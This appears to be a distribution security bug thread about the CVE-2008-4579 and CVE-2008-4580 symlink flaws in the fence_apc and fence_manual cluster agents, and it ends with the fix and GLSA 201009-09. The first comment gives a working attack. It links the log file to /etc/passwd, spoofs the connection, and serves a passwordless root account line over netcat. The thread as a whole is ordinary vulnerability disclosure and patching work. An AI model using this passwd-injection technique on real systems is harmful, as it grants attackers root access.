/usr/sbin/fence_apc logs to /tmp/apclog, if you use verbose mode: ./fence_apc -v -l foo -p bar -n 1 -a 192.168.0.1 it will write into that file. if you a) link to /etc/passwd b) redirect the connection (e.g. arp-spoof, dns-spoof) you can do this on the host you redirected to: echo "hacked::0:0:root:/root:/bin/bash" | nc -l -p 23 And the account will be appened in /etc/passwd. Honestly I doubt that will ever happen in reality, but it's possible. http://git.fedorahosted.org/git/cluster.git?p=cluster.git;a=blob_plain;f=fence/agents/apc/fence_apc.py;hb=HEAD seems to be a completely updated version.
http://www.openwall.com/lists/oss-security/2008/10/13/3 Seems there is also a hole in fence_manual / fence_ack_manual fifo handling, it's a different bug, but I guess we can fix both in this bug #.
CVE-2008-4579 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4579): The (1) fence_apc and (2) fence_apc_snmp programs, as used in (a) fence 2.02.00-r1 and possibly (b) cman, when running in verbose mode, allows local users to append to arbitrary files via a symlink attack on the apclog temporary file. CVE-2008-4580 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4580): fence_manual in fence allows local users to modify arbitrary files via a symlink attack on the fence_manual.fifo temporary file.
ha-cluster: *ping*
ha-cluster: Looks like you did some bumping. Can you please ascertain/confirm whether this issue is fixed in your newer ebuilds?
(In reply to comment #4) > ha-cluster: Looks like you did some bumping. Can you please ascertain/confirm > whether this issue is fixed in your newer ebuilds? > Thanks! I found this at the Debian bugtracker: * New upstream release version 2.03.09. - Upstream code audit fixes several tmpfile race conditions, among them CVE-2008-4579 and CVE-2008-4580. (Closes: #496410) We have that version in the tree, stabled, old versions are removed. So, GLSA voting time!
Ready to vote, I vote YES. What about you, a3li? ;)
YES, filed
There is no sys-cluster/fence in portage any more.
GLSA 201009-09, thanks everyone.
